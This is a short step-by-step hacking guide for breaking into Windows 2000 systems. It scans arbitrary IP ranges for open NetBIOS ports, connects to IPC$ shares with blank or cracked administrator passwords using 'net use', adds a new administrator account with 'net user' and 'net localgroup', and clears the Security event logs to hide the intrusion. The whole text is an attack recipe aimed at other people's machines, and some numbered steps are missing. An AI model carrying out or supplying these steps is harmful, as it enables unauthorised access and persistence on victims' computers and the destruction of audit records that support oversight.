Before starting, you need to be running a Win2k system:
Superscan version 3.00 by Foundstone (246kb)
Homepage NetBrute Scanner 18.104.22.168 (247KB)
Homepage PQWak V1.0 (24KB)
Step 1: Scanning for Open Win2k Systems
2. Select a IP range
3. Check "Only scan responsive pings" and "All selected ports in list"
4. Only scan ports 139 (NetBIOS), and 1025 (Network Blackjack)
5. When a system with both Netbios and BlackJack is found, open NetBrute, and scan that IP to see if there is an IPC$
Step 2: Connecting to the IPC$
2. Type in " net use \\ipaddress\ipc$ "" /user:administrator "
3. If you connect to the system, it will say, " The command was completed successfully "
4. If it says, bad username or password, Try running PQWak.exe to crack the share name password. Then insert the password like so:
net use \\ipaddress\ipc$ "password" /user:administrator
5. Users usually have only one password for everything. So try the c$ share pass as the administrator password to connect to the IPC$.
Step 3: Connecting Using Computer Management
2. Click Action, then Connect to Another Computer
3. Type in the IP address.
Step 4: Creating User Accounts and Adding Them to a Group
2. If prompted to type a username and password, type Administrator with no password.
3. To create a user account, type the following: Net user username password /add
4. Replace Username and password with whatever you like.
5. To add a user account to a domain, type the following: Net localgroup administrators username /add Or Net group administrators username /address.
Step 5: Covering Your Tracks
2. While logged on to Computer Management. Check if the Security Logs are being audited in Event Viewer. If they are, clear them.